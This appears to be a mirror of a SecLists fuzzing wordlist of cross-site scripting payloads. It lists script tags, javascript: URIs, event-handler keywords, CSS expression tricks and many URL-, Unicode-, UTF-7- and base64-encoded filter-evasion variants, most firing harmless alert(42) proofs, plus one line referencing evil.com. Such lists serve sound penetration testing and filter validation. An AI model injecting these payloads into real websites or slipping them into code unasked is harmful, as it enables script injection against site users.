mirror of
https://github.com/danielmiessler/SecLists.git
synced 2026-07-16 14:25:01 +00:00
164 lines
5.9 KiB
Plaintext
164 lines
5.9 KiB
Plaintext
"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script>
|
|
"'><script>alert('XSS')</script>
|
|
"'><script>alert(/XSS/)</script>
|
|
"'><script>alert(42)</script>
|
|
"'><script>prompt(42)</script>
|
|
"'><script>confirm(42)</script>
|
|
"'><sCriPt>confirm(42)</sCriPt>
|
|
"'><script >confirm(42)</script >
|
|
"'><script foo=bar>confirm(42)</script>
|
|
"'><\script>confirm(42)</script>
|
|
"'><sc\ript>confirm(42)</script>
|
|
"'><sc\tript>confirm(42)</script>
|
|
"'><script onlyOpera:-)>alert(42)
|
|
"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/
|
|
"'><script x:href='//evil.com/onlyOpera'>
|
|
"'><///script///>alert(42)</script>
|
|
"'><///style///>alert(42)</script>
|
|
"'><;(24)trela=daolno ;''=e>'=d
|
|
"'><;(24)trela=daolno ;''=/e>'=d
|
|
"'><isindex action="javas	cript:alert(42)" type=image>
|
|
"'><sc ript>confirm(42)</script>
|
|
"'%3e%3cscript%3econfirm(42)%3c/script%3e
|
|
"'%253e%253cscript%253econfirm(42)%253c/script%253e
|
|
"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
|
|
"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
|
|
"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
|
|
"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
|
|
%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
|
|
%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
|
|
%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
|
|
%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
|
|
%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
|
|
%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
|
|
%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
|
|
"'><script>\u0061lert(42)</script>
|
|
"'ܾܼscriptܾalert(42)ܼܯscriptܾ
|
|
"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
|
|
"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
|
|
%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
|
|
%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
|
|
"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
|
|
"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
|
|
%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
|
|
%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
|
|
javascript:alert(42)
|
|
javascript:prompt(42)
|
|
javascript:confirm(42)
|
|
jAvasCript:confirm(42)
|
|
jAvas\Cript:confirm(42)
|
|
jAvas Cript:confirm(42)
|
|
jAvas/* */Cript:confirm(42)
|
|
javascript:alert(42)
|
|
document
|
|
document.
|
|
top
|
|
top.
|
|
top[
|
|
eval
|
|
eval(
|
|
cookie
|
|
.cookie
|
|
onerror
|
|
onerror=
|
|
onclick
|
|
onclick=
|
|
onmouseover
|
|
onmouseover=
|
|
onload
|
|
onload=
|
|
"onerror
|
|
"onerror=
|
|
"onclick
|
|
"onclick=
|
|
"onmouseover
|
|
"onmouseover=
|
|
"onload
|
|
"onload=
|
|
href=
|
|
src=
|
|
link=
|
|
style=
|
|
alt=
|
|
title=
|
|
egal=
|
|
"href=
|
|
"src=
|
|
"link=
|
|
"style=
|
|
"alt=
|
|
"title=
|
|
"egal=
|
|
<a
|
|
<a href=
|
|
<a alt=42 href=
|
|
<a href="javascript:
|
|
<a href=" javascript:
|
|
<p
|
|
<div
|
|
<iframe
|
|
<index
|
|
<layer
|
|
<link
|
|
<meta
|
|
<style
|
|
<script
|
|
<img src="/" =_=" title="onerror='alert(42)'">
|
|
<img src ?notinChrome?\/onerror = alert(42)
|
|
<img src ?notinChrome?\/onerror=alert(42)
|
|
<img/alt="/"src="/"onerror=alert(42)>
|
|
<iframe/src \/\/onload = alert(42)
|
|
<iframe/onreadystatechange=alert(42)
|
|
<!-- open comment
|
|
<!-- complete comment -->
|
|
--><!-- close/complete comment -->
|
|
<![CDATA[
|
|
<![CDATA[ open cdata
|
|
<![CDATA[ complete cdata ]]>
|
|
]]><![CDATA[ close/complete cdata ]]>
|
|
<?xml
|
|
<?xml version="1.0">
|
|
" value=``
|
|
onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS')
|
|
onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
|
|
<div style="{ left:expression( alert('XSS') ) }">
|
|
left:expr/**/ession(alert('XSS'))
|
|
left:expr/* */ession(alert('XSS'))
|
|
left:e\0078pr\0065ssion(alert('XSS'))
|
|
left:\0065\0078pr\0065ssion(alert('XSS'))
|
|
left:expr\65ssion(alert('XSS') ))
|
|
left:expr\0065ssion(alert('XSS'))
|
|
left:expression(alert('XSS'))
|
|
left:expression(alert('XSS'))
|
|
left:expression(alert('XSS'))
|
|
left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS'))
|
|
left:expression(alert('XSS'))
|
|
left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
|
|
left:expression(alert('XSS'))
|
|
left:EXPR/**/ESSION(alert('XSS'))
|
|
left:EXPR/* */ESSION(alert('XSS'))
|
|
left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS'))
|
|
left:EXPRbsSION(alert('XSS'))
|
|
left:EXPRESSION(alert('XSS'))
|
|
left:exp\0280essio\0274(alert('XSS'))
|
|
left:exp\0280essio\207f(alert('XSS'))
|
|
left:expʀessioɴ(alert('XSS'))
|
|
left:expʀessioⁿ(alert('XSS'))
|
|
%u00ABscript%u00BB
|
|
〈script〉
|
|
U%2bFF1CscriptU%2bFF1E
|
|
‹script›
|
|
〈script〉
|
|
⟨script⟩
|
|
href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded
|
|
href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all)
|
|
href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64
|
|
href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7
|
|
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all)
|
|
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix
|
|
href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64
|
|
href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64
|
|
href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7
|
|
%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
|
|
%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
|
|
<%<!--'%><script>alert(42);</script --> |